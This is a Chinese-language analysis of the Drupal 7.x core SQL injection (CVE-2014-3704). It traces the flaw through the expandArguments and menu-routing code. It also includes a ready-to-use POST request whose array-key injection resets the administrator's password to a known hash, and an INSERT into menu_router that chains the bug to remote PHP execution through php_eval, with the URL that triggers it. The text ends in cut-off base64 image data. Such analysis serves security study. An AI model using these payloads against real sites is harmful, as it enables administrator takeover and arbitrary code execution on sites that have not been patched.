目录

. 漏洞描述

. 漏洞触发条件

. 漏洞影响范围

. 漏洞代码分析

. 防御方法

. 攻防思考

1. 漏洞描述

Use Drupal to build everything from personal blogs to enterprise applications. Thousands of add-on modules and designs let you build any site you can imagine. Join us!
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成

Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架),即: CMS + Framework

. Framework

它由2部分组成

    ) Drupal内核中的功能强大的PHP类库和PHP函数库

    ) 在此基础上抽象的Drupal API

. CMS

HTML+JAVASCRIPT+CSS

Drupal的架构由三大部分组成

. 内核

. 模块

. 主题

三者通过Hook机制紧密的联系起来。其中,内核部分由世界上多位著名的WEB开发专家组成的团队负责开发和维护,drupal的这种面向对象的集中实现化的机制为开发者开来了极大的编程体验的提升,但同时也引入了一个风险,一旦这种底层的、内核的实现路由上的某个节点出了漏洞,权限漏洞、或者例如sql注入的边界检查缺失,则造成的影响将是全系统的破坏

这次的Drupal发生的高危SQL注入漏洞就是源于这个原因,因为发生漏洞的位置处于Drupal的内核区域,虽然是WEB应用,但是我们可以理解为处于一个高权限的代码区域,在这个逻辑层面发生的SQL注入可以导致很高权限的代码执行

A vulnerability in this API allows an attacker to send specially crafted requests resulting in arbitrary SQL execution. Depending on the content of the requests this can lead to privilege escalation, arbitrary PHP execution, or other attacks.

Relevant Link:

https://www.drupal.org/PSA-2014-003

https://www.drupal.org/SA-CORE-2014-005

http://www.oschina.net/news/56637/drupal-security-hole

https://security.berkeley.edu/content/critical-drupal-7x-sql-injection-vulnerability-cve-2014-3704

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704

http://www.freebuf.com/vuls/47271.html

2. 漏洞触发条件

POST /drupal-7.31/?q=node&destination=node HTTP/1.1

Host: 127.0.0.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/ Firefox/28.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/drupal-7.31/

Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 231

name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

3. 漏洞影响范围

0x1: 受影响的版本

Drupal 7.x - 7.31

4. 漏洞代码分析

0x1: 导致SQL注入的代码分析

下载Drupal 7.31的源代码进行分析,产生漏洞的源头在"/includes/database/database.inc",从架构上来说,这是Drupal的"内核"

/**

   * Expands out shorthand placeholders.

   *

   * Drupal supports an alternate syntax for doing arrays of values. We

   * therefore need to expand them out into a full, executable query string.

   *

   * @param $query

   *   The query string to modify.

   * @param $args

   *   The arguments for the query.

   *

   * @return

   *   TRUE if the query was modified, FALSE otherwise.

   */

  protected function expandArguments(&$query, &$args)

  {

    $modified = FALSE;

    // If the placeholder value to insert is an array, assume that we need

    // to expand it out into a comma-delimited set of placeholders.

    /*

    array_filter can Iterates over each value in the array passing them to the callback function. If the callback function returns true, the current value from array is returned into the result array. Array keys are preserved.

    array_filter($args, 'is_array')起到过滤器的作用,从$args中剥离出"数组"的部分

    */

    foreach (array_filter($args, 'is_array') as $key => $data)

    {

      $new_keys = array();

      /*

      这行代码是导致漏洞的关键点:

      1. 没有对array的key、value进行"参数化纯净性验证",导致黑客在key中注入了可执行代码,对即将执行的sql语句进行了污染

      2. 即没有将输入的值强制限定在程序预先设定的可接受的值范围内

      */

      foreach ($data as $i => $value)

      {

        // This assumes that there are no other placeholders that use the same

        // name.  For example, if the array placeholder is defined as :example

        // and there is already an :example_2 placeholder, this will generate

        // a duplicate key.  We do not account for that as the calling code

        // is already broken if that happens.

        $new_keys[$key . '_' . $i] = $value;

      }

      // Update the query with the new placeholders.

      // preg_replace is necessary to ensure the replacement does not affect

      // placeholders that start with the same exact text. For example, if the

      // query contains the placeholders :foo and :foobar, and :foo has an

      // array of values, using str_replace would affect both placeholders,

      // but using the following preg_replace would only affect :foo because

      // it is followed by a non-word character.

      $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);

      // Update the args array with the new placeholders.

      unset($args[$key]);

      $args += $new_keys;

      $modified = TRUE;

    }

    return $modified;

  }

从expandArguments函数中我们可以看到,代码没有对key、value同时采取"参数化纯净预处理",导致黑客在key中进行了代码注入,而之后这个key又被带入了sql语句的拼接中,这也正是drupla提供的一个DB PDO抽象函数,方便程序员使用array数组的方式进行sql查询语句的拼接,但是问题就在于drupal在处理这个input array的时候没有进行必要的处理

我们继续回溯代码,找到调用expandArguments()函数的代码路径

/includes/database/database.inc

..

public function query($query, array $args = array(), $options = array()) {

    // Use default values if not already set.

    $options += $this->defaultOptions();

    try {

      // We allow either a pre-bound statement object or a literal string.

      // In either case, we want to end up with an executed statement object,

      // which we pass to PDOStatement::execute.

      if ($query instanceof DatabaseStatementInterface) {

        $stmt = $query;

        $stmt->execute(NULL, $options);

      }

      else {

        $this->expandArguments($query, $args);

        $stmt = $this->prepareQuery($query);

    //程序在这里将被污染后的sql语句直接带入了数据库执行逻辑,导致了sql注入

        $stmt->execute($args, $options);

      }

      ...

了解了代码层面的原理之后,我们来看看实际的攻击载荷

name[%;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'';;#%%]=test3

&name[]=test

&pass=shit2

&test2=test

&form_build_id=

&form_id=user_login_block

&op=Log+in

attack payload将管理员的密码修改为一个预设的密码,这个密码可以自己本机生成

/includes/password.inc

这个文件中就是drupal对密码加解密算法的一个实现,它是一个对称加密模式,我们可以复用它的代码实现一个密码生成器

0x2: 基于这个SQL注入衍生出的callback漏洞分析

我们已经知道了Drupal的这个抽象PDO API存在SQL注入的漏洞,它可以直接导致的一个结果就是黑客可以通过这个漏洞进行"多语句SQL执行",进行进而向数据库中添加任意的记录(实际上是执行任意的SQL语句)

在多数情况下,单独的一个漏洞也许并不能真正对WEB系统造成实际的攻击,它们很多时候只是语言的一个"特性",例如php的callback回调执行机制,它是php的一个特性,单纯就这点来看并不能称之为一个漏洞,但是在这个CVE的场景下,当它和SQL注入结合在一起的时候,就会升级为一个RCE远程代码执行漏洞了

mixed call_user_func_array ( callable $callback , array $param_arr )

//Calls the callback given by the first parameter with the parameters in param_arr.

http://cn2.php.net/manual/en/function.call-user-func-array.php

利用漏洞挖掘的"敏感函数点调用源回溯"思想,我们对drupal的代码进行一次审计,即搜索在哪些文件中调用了call_user_func_array这个函数

定位到/include/menu.inc这个文件中的menu_execute_active_handler()函数

function menu_execute_active_handler($path = NULL, $deliver = TRUE)

{

  // Check if site is offline.

  $page_callback_result = _menu_site_is_offline() ? MENU_SITE_OFFLINE : MENU_SITE_ONLINE;

  // Allow other modules to change the site status but not the path because that

  // would not change the global variable. hook_url_inbound_alter() can be used

  // to change the path. Code later will not use the $read_only_path variable.

  $read_only_path = !empty($path) ? $path : $_GET['q'];

  drupal_alter('menu_site_status', $page_callback_result, $read_only_path);

  // Only continue if the site status is not set.

  if ($page_callback_result == MENU_SITE_ONLINE)

  {

    if ($router_item = menu_get_item($path))

    {

      if ($router_item['access'])

      {

        if ($router_item['include_file'])

        {

          require_once DRUPAL_ROOT . '/' . $router_item['include_file'];

        }

        /*

        这里是漏洞利用的关键代码,call_user_func_array接收了$router_item的两个参数,如果我们可以控制这2个参数,就可以达到rce的效果

        */

        $page_callback_result = call_user_func_array($router_item['page_callback'], $router_item['page_arguments']);

      }

      else

      {

        $page_callback_result = MENU_ACCESS_DENIED;

      }

    }

    else

    {

      $page_callback_result = MENU_NOT_FOUND;

    }

  }

  // Deliver the result of the page callback to the browser, or if requested,

  // return it raw, so calling code can do more processing.

  if ($deliver)

  {

    $default_delivery_callback = (isset($router_item) && $router_item) ? $router_item['delivery_callback'] : NULL;

    drupal_deliver_page($page_callback_result, $default_delivery_callback);

  }

  else

  {

    return $page_callback_result;

  }

}

注意到代码中的 $page_callback_result = call_user_func_array($router_item['page_callback'], $router_item['page_arguments']);

call_user_func_array接收了$router_item的两个参数,如果我们可以控制这2个参数,就可以达到rce的效果,而$router_item是通过 $router_item = menu_get_item($path) 赋值的,那应该怎么做呢?

我们继续溯源menu_get_item

/**

 * Gets a router item.

 *

 * @param $path

 *   The path; for example, 'node/5'. The function will find the corresponding

 *   node/% item and return that.

 * @param $router_item

 *   Internal use only.

 *

 * @return

 *   The router item or, if an error occurs in _menu_translate(), FALSE. A

 *   router item is an associative array corresponding to one row in the

 *   menu_router table. The value corresponding to the key 'map' holds the

 *   loaded objects. The value corresponding to the key 'access' is TRUE if the

 *   current user can access this page. The values corresponding to the keys

 *   'title', 'page_arguments', 'access_arguments', and 'theme_arguments' will

 *   be filled in based on the database values and the objects loaded.

 */

function menu_get_item($path = NULL, $router_item = NULL)

{

  $router_items = &drupal_static(__FUNCTION__);

  /*

  这里是代码的关键,我们输入的$_GET['q']控制了最终的$router_item

  */

  if (!isset($path))

  {

    $path = $_GET['q'];

  }

  if (isset($router_item))

  {

    $router_items[$path] = $router_item;

  }

  if (!isset($router_items[$path])) {

    // Rebuild if we know it's needed, or if the menu masks are missing which

    // occurs rarely, likely due to a race condition of multiple rebuilds.

    if (variable_get('menu_rebuild_needed', FALSE) || !variable_get('menu_masks', array())) {

      menu_rebuild();

    }

    $original_map = arg(NULL, $path);

    $parts = array_slice($original_map, , MENU_MAX_PARTS);

    $ancestors = menu_get_ancestors($parts);

    /*

    在menu_router里查询我们输入的$_GET['q'],然后返回所有字段

    */

    $router_item = db_query_range('SELECT * FROM {menu_router} WHERE path IN (:ancestors) ORDER BY fit DESC', , , array(':ancestors' => $ancestors))->fetchAssoc();

    if ($router_item)

    {

      // Allow modules to alter the router item before it is translated and

      // checked for access.

      drupal_alter('menu_get_item', $router_item, $path, $original_map);

      $map = _menu_translate($router_item, $original_map);

      $router_item['original_map'] = $original_map;

      if ($map === FALSE) {

        $router_items[$path] = FALSE;

        return FALSE;

      }

      if ($router_item['access']) {

        $router_item['map'] = $map;

        $router_item['page_arguments'] = array_merge(menu_unserialize($router_item['page_arguments'], $map), array_slice($map, $router_item['number_parts']));

        $router_item['theme_arguments'] = array_merge(menu_unserialize($router_item['theme_arguments'], $map), array_slice($map, $router_item['number_parts']));

      }

    }

    $router_items[$path] = $router_item;

  }

  return $router_items[$path];

}

在这个函数中,我们看到几个关键点

. 我们的输入$_GET["q"]可以控制$path,进而控制$router_item最终获取的值

. 在 menu_router数据表 里查询我们输入的$_GET['q'],然后从返回所有字段

继续回到上层的调用函数menu_execute_active_handler()中

if ($router_item['include_file'])

{

      require_once DRUPAL_ROOT . '/' . $router_item['include_file'];

}

这里又根据刚才从数据库中查出的$router_item["include_file"]进行文件引入,紧接着取出router_item中的page_callback,带入call_user_func_array执行

分析至此,我们来梳理一下这个代码漏洞的攻击流程

. 程序根据用户输入的$_GET['q']作为条件在"menu_router"数据表中查找对应的记录,并将所有的结果都返回回来


. 而通过drupal的SQL注入漏洞,我们可以向"menu_router"数据表中插入任意我们需要的记录


. 在向"menu_router"数据表中插入数据的时候,"page_arguments"这个字段一定要为null,这样根据PHP的特性,$router_item['page_arguments']就等效于$router_item[],即返回记录中的第一个字段参数


. 最终的RCE执行点在menu_execute_active_handler的

call_user_func_array($router_item['page_callback'], $router_item['page_arguments']); 中

也即

call_user_func_array($router_item['page_callback'], $router_item[]);


. 我们需要利用PHP的这个callback回调进行代码执行,也即我们需要构造出这样的代码场景

call_user_func_array("php_eval", $router_item[]);


. php_eval这个函数的实现在"modules/php/php.module"目录中,我们需要将它引入进来

综合以上分析,我们可以得出以下结论,我们需要在"menu_router"数据表中插入一条这样的数据才能满足攻击条件

insert into menu_router (path,  page_callback, access_callback, include_file) values ('<?php phpinfo();?>','php_eval', '', 'modules/php/php.module');

可以看到,path = $_GET['q'],$_GET['q']即我们需要执行的代码,同时也是数据库查询的关键字索引

path 为要执行的代码;

include_file 为 PHP filter Module 的路径;

page_callback 为 php_eval;

access_callback 为 (可以让任意用户访问)。

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAA+UAAAB1CAIAAACnL9cDAAAORUlEQVR4nO3da48kVR0H4P4KfBUxihovLyYYXyFqRBEFAaOgJLISEAVkQUQ0oga8xESXm2uyQTCKZjVeE0EuwsYlYlTiC2Fc4kgAF8IChvHF6KToc+rUv6qru0/3Pk9+Ib011eecOtUz/aN3xMn29vahIzff9ZcPPfn8g8f+8/eXXt566eV/ioiIiIhIDZkcOXrorj+f+/x//vbsSw8+8+Kvn37hZ0+9cFBERERERGrI5OCje5547jfPvPibJ4/dvnVs/9ax20REREREpJJM9j/89qdfuPtfx25f+lJERERERGQqk1sOn/z0i7/0ybqIiIiISIWZ3HL45Kde+OnS1yEiIiIiIml2+vrBpa9DRERERETS6OsiIiIiIvVGXxcRERERqTf6uoiIiIhIvdHXRURERETqzXHa1yeTSfbgjlHG7Byn7YTm8b6DDF58fHnzmCu4njZLX9vgzex1r3udv/PV2vZh8Kat9IWIiIjMmOO0r281Ck25phdqYrlPZI/0Ha2znpb/2DlvYc196+OAzc8uL3hTIoPHb9ZYKd+4wfc6OFpwxsqTXXC6/hW6IhERkRkzcl//+u8+8Z37L47O3Xhj7mwVbV0nLSv9rn+GT5HbelJhwc0nNv8Zn3rSs+q1PaVz/Lavlg3Y83RJ6Rri8w5bwygp7Ofs9zp4+zp3svyUyE3Mnpa9EZHTghuS3cB53EQREZEKM2Zf/9o9ey740Tnn3Xnmt++5KDr9/9+8y+/i2ZpSeNDj+rtKZ2RVhcaZjhBcdnNbmgsrP71tqDbB04KTBve/PG/hGqdOCO5JZA2jJB1zrHvdaw2Re11efOHkzvuerrz8mumcqO0Wz+kmioiIVJjR+vrX7t7zsR+e/eU/XHXNvZ86a/9p3/zVx0PTN6pJsCVkj/TqN+VKlB1565VNKP1SekVtI2Qnmho20oSyPaxQB8uPg5sQvB3lze9cXvby49M1X1GFzjpu20sHH/Fep+N07kyv74js7PHTyisvnNY2Rfod2nbh495EERGROjNOX7/x7gvP/8FZXzq094uHPvPB773nLde87vGj+0LTN96Vp2pW+njqiekfe715Z9tAYaLIg86vbr2yjmR7ZHnkwvIKxbRNeXOyf2x7VnDzsxebrWjpvFMnFC42srbChfR6IZWnmMe9bntW+V6XLypyiyNr6HWBkfUUXhKRcURERNYgvfv6vU989Sd/u7Z55MbfXnjenWd+4aHPXPfQFWftP+3NV58ULOtbLaW57X292Tmyb9u93ryzk0baRvZBthV1tq7OI+nIvUpP21X32plhE8UXEGx45V0N3sT4wb6XHJxilnvd+dIqX8VS+nrhe7m8mHJND44jIiKyHunX1x944oZP/OLsS399wR2P7N05csNvL/zIHR+47sHLr33wsjO/++43XfXaeFnf6vqQO97JZu/r5em2Xlmn0i9lB2lbaqowadtoabfLDpidrjB1dvbggPFtD96I7NY1n1Jef/DOdu78sOsa915n70JwxsgNyu5/8LS256a3LzJF8yoiL4let0lERGQV06Ov3/OPr1z087M/d9+lX3royvd97x0HDl/+jXsu/PD3z/jc7y+75oFL33/bu9649zW9yvrWzH09LXDDpi6MEOku5SLS2TCGdbjCIJF967yotmUENycyftss2QfNO97sc2kTDd7EwkWNcl3BlcTvdaTvBqtz/ImR04KvmV5TDN5PERGR9UuPvr753M3n/OC9F//io185/Nlr7vvU+T8864K7zrn6vk9e9cAnz7j1nW+48tV9y/pWsUR2No/Cg3S07NSRJ86jr6fa1patp21nRtZQruB9e/mwtpTd4ew/g8Wx80uL6Xlt93HEez31lHTeyOPOxRf2Pztm9rmRKfpu5gJuooiISIXp9/swjz970+n7T73gx+dc99AV1/7+03vvv3jvfReffss7Xn/FwLJe6GdTj7N1Z6rclIvR1BO3Yu/32co1NUV53gGtItuE0i+1bVF6vLCrkXW2fWlYYcrexOB9id/cvkdmz4y70bnI5uaUb1z6TRFcSfqqDt6C4HdEfD2FF+pcb6KIiEiF6f2/N3382X2nfutt597+vqvuv+SKey96702nvu7yEweU9Y5l9XknjjeSdPBJTnAl2aZVLsRls1xm2xqCGxtsZjNeQnC1wT4XuZa+93TGTFoK6yj3Or2KqdEKg/e6OzVk0vV3LKt1OSIiIrNkyH/P8bGj+956/VvOuPVdp+075aTLXjVuWe/b/ERERERE1jgD//vrjx3d98arX/v6y0/cfPampV+DiIiIiMi6Zvj/X9Jj//6Osi4iIiIiMteM8/9vKiIiIiIi84i+LiIiIiJS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" alt="" />

访问: http://localhost/drupal-7.32/?q=%3C?php%20phpinfo();?%3E

aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAABC0AAAEaCAIAAAC6qTruAAAgAElEQVR4nO3d63MUZcL+8fkv9h1aVFllSRWUr1xq16JK6wduYQFGBRQL3EWBQDjkALigKGFXQDCmUgsYN5KHQwjEwK5yMAEiEiFBTZAnh4WISUhCCDknKGM9oPTvRcts04d7eiZz99098/3UVVOTTndPT2dk7svungn9v9LOqaVdwbqtvR72efywl7jllltuueWWW2655da3t6GpB7umlnYG61Z5zYgaP+wlbrnllltuueWWW2659e1taOrBrmkHrwfrtvZ6+ML1sJ9v/bCXuOWWW2655ZZbbrnl1re3oWkHr0872BWs2wvXwz6PH/YSt9xyyy233HLLLbfc+vY2NO3g9WcOXQ/W7YXr4QvdYT/f+mEvccstt9xyyy233HLLrW9vQ88cuh64XOgO+zzKdxEhhBBCCCF+TkgDAAAAAG/RQwAAAAB4jR4CAAAAwGv0EAAAAABeo4cAAAAA8Bo9BAAAAIDX6CEAAAAAvEYPAQAAAOA1eggAAAAAr9FDAAAAAHiNHgIAAADAa/QQAAAAAF6jhwAAAADwGj0EAAAAgNfoIQAAAAC8Rg8BAAAA4DV6CAAAAACv0UMAAAAAeI0eAgAAAMBr9BAAAAAAXqOHAAAAAPAaPQQAAACA1+ghAAAAALxGDwEAAADgtcD1kKubM49ubhBPAQAAAOBr9BAAAAAAXqOHAAAAAPBacvWQwasfbD7+u8yjv1t9ctfl25qmaTfrZ2ae3PXlhZmrj4Yyjy843dN+/uy01UdDmZ+vPN/72wpGW3fdX+qDi0PePh0AAAAgFQWyh4Qs2dygaVpPce7RmWWdw9ovwxe/eiLz9Oejeg85+sTHV4e1X4a//uJ3mUfnlHUOa7/0nD4dyvzqO824lKZdr5+T+XnxdbVPEAAAAEh+gewh9sdD2r+ZoncPTdO03tLco3NOD2g362dmfl7crmnab8dGSm9qmqZpDV+FMr+q1fSlvjhzR1/ql9qPj075F0UEAAAAkCuJekikWmiapg2Ubj4687cecr972PaQhq/MR1c+vurl8wEAAABSUBL1EMfjIcIe8sDxEAAAAABeSKIeYr4+5GTpTS16DzFeHzJ6dfNfjy4+P+LtMwIAAABSTjL1kP9+XtZDfz296/KPmuamh/x3qdDq4wvKrv3s2VMBAAAAUlXgeggAAACAwKOHAAAAAPAaPQQAAACA1+ghAAAAALxGDwEAAADgNXoIAAAAAK/RQwAAAAB4jR4CAAAAwGv0EAAAAABeo4cAAAAA8Bo9BAAAAIDX6CEAAAAAvEYPAQAAAOA1eggAAAAAr9FDAAAAAHiNHgIAAADAa/QQAAAAAF6jhwAAAADwGj0EAAAAgNfoIQAAAAC8Rg8BAAAA4DV6CAAAAACvBayH/B/gOdWvegAAgCQUvB4SDt8ixLPQQwAAAGSghxAiCj0EAABABnoICVju3r1z7969xL6u7t27d/fuHduHo4cAAADIQA8hQUrCG4jRvXv3rI9IDwEAAJCBHkICk7t378h+gVmPitBDAAAAZKCHkMBEfDDk7t27Bw7sLSs78Ouvv8b9ArMeEqGHAAAAyEAPIYGJ7Uuiu7vr559/1jTt2rX2ffuK9+0r7uzs0DTtp59+1O/EyvSg9BAAAAAZ6CEkMLG+Hjo7O/btKz5wYO+pUxUlJXv0HlJSsifyY1dXZ6yvMdOD0kMAAABkoIeQwMT6evjppx8j9cOakpI94fDtWF9jpgelhwAAAMhADyGBie1L4uTJzyPF4/DhssOHyyI/njpVEcdrzPSg9BAAAAAZ6CEkMDG9GH799deOjmsHDuzVW0dj4//q0xsb/zdyPOTatfa7d+/G9BozPajsHlJYWEcIIYSQFI/UwYZv0UNIYGJ6MZSVHYgc+igvP2T8VXn5ocivDhzYG9NrzPSg9BBCCCGEyI7UwYZv0UNIYGJ6MUSOhIh7SFnZAU3TWluvHj/+2aFDJaZrSL7//opptaYHpYcQQgghRHakDjZ8ix5CAhPTi+Hu3bvXrrWLz8vq6Limf53Ir7/+Wll5wlRCzpw5bX2NmR6UHkIIIYQQ2ZE62PAteggJTGxfEqdOVThdp37y5OfGOcPh2598cjDy208+Oah/8YiJ6UHpIYQQQgiRHamDDd+ih5DAxPp6CIdviz+396effjTOf/Nmz/79/6P/tru7y/Y1ZnpQegghhBBCZEfqYMO36CEkMLG+Hrq7u/S+cfLk58bvMYz8aP1Kdf2sra+/rnV6jZkelB5CCCGE+Cr/LKorKqr/Z1HdR/9UvzGJitTBhm+lVg+pgwpu/jQ//jg8ONh/82ZPT8+N6w5sXxKdnR0//nhL07SOjmt6D7l2rV3TtHD4ttMRj4sX63755Ren1xg9hBBCCPE+RUX1pQcbSg82HD12+ci/GytPtlRUtpz4/HLlyZbKky0nPr/82bGmI/9uPPLvxrLySyUHL+7Z/+3uPd8UFV8oLKrZWXi+YMdX+QXV2/PO5OWffe/9M1u2VW1//+x775/Jyz9bUHBux84Lyp+gOFIHG76Vcj1E9TNIOVF7yK1bQ729N69fv97b2zs4ODg8PHzLwb179wQP9Ouvv5aVHThwYG+sXxhidO/ePXoIIYQQIjtFRfVl5ZcqT7ZUn2ur/bqj+fLNxuaei5euX7x0va6+s/brjpraa9Xn2s58+cOZL384VdVScfJypIqUlV8qLfvOWEV2Fp7/x87zBTu+ipSQTe9Wvp1bsX7D8fUbjq/+66fZa49krSlf/9bh9RuO5246uv39s35rJlIHG75FD4Fc4h4yNDTQ3d3d19c3MjLiVD8i7ty5I3tr7969Qw8hhBBCZGR/yaWKypaa2mtXWvrarw22XxtsbRtobRu4+kP/lZY+vYrU1XfqlaPk4EW9Y+Tln92yrUrP37ec0rPp3Uo9b+dWmGKcqPeQteuP5bxxJGtN+crs0hWZJctX7U3PKFqy9KOMlbvXvFG6Mfdf2/POKN85UgcbvkUPgVyCHnLzZs/169cHBwdv3bo1Ojqql41RA+t08SGRMbIeDKGHEEIIIWPJ7j3fHD12ua6+s/3aYGfXcPeNET2dXcOdXcN66ygrv7Sz8Hx+QfXa9cfkRT8qkplzaEVmydLlHy9Z+tGiJTtfW1Tw54Xvz391658Xvr9i5Ycbc/+Vl39WyY6SOtjwLXoI5HLqId3d1xsbG4eGhmyLh9OtflQk4W3k3r171iMh9BBCCCEkvuze882Jzy9fvHTdVD+utPSd/uL70rLvCnZ8JbV1RE322iMrs0uXrSh+bVHB/Fe3zn9167xXNr08b8OcuW/Of3XrunX7PC4kUgcbvkUPgVy2PWRkZKC5ubmvr89YQkZGRkZGRkYfNDQ0NDQ0pE+3/takr6+vubl5eHhgLC8SegghhBASX4qK6vWjH1da+lrbBvQS0to2cPqL7/fs//bvW06p7R6CTrJ81d5FS3bOe2XTnLlvvjj7jbS0rLS0rJfnbVjzRuk/dp73YNdJHWz4Fj0Ectn2kNbW1o6Ojki1iBSMSBUZGRmpr6/fvXv36tWrV69eXVxcXF9fbyot1gIzMjLS0dHR2voDPYQQQgjxMvtLLlWebGls7mm+fPNKS9/VH/obm3s+O9a0Pe+M8poRUzJzDr22qGDO3DfT0rJmzFg2Y8ayZ6cvXLJ4a+6mo1J3oNTBhm/RQyCXtYcMDw80NjYODg6O3Dc8PGy8Mzw8XFFRMX/+/NmzZ6elpaWlpc2ePXv+/PkVFRUj0QwODjY2NibwkAg9hBBCCBGk9GDDmS9/qKvvvHjpun6h+ZF/N773fiLrR35BdWFRjTVbtlXJKyQrs0v/vPD9tLSsZ6cvnDZ1wbSpC9LSstat2ydpN0odbPgWPQRyWXtIV1dnW1vb8PBwpH6Y1NfXz5s37y9/+cvu3bsvXrx48eLF3bt3/+Uvf5k3b159fX1kQePixvutra1dXZ30EEIIIURqSg82nP7i+5raa7Vfd9TVd574/PI/dp5PeB/Ysq1K07TamlprhoZue3CEJH1Z0Zy5b06buuDpp+Y+/dTcZ6cvzMn+MOE7U+pgw7foIZDL2kNaWq50d3cPOyssLHz++eeLi4tHRkZu3759+/btwcHB4uLi559/vrCwULCgrru7u6XlCj2EEEIIkRT9E3jPfPlD9bm26nNtZeWXNr1bKakGFBbV1NbUjh/3kCnTn/mTNz1ET2bOIb2NTHly1pQnZ02buiCxx0akDjZ8ix4Cuaw9pKmpqb+/36lFDA4OZmRkzJo1q6Wlpd+gpaVl1qxZGRkZ+ncdCvT29l6+/B96CCGEEJLwFBXVH/l3Y8X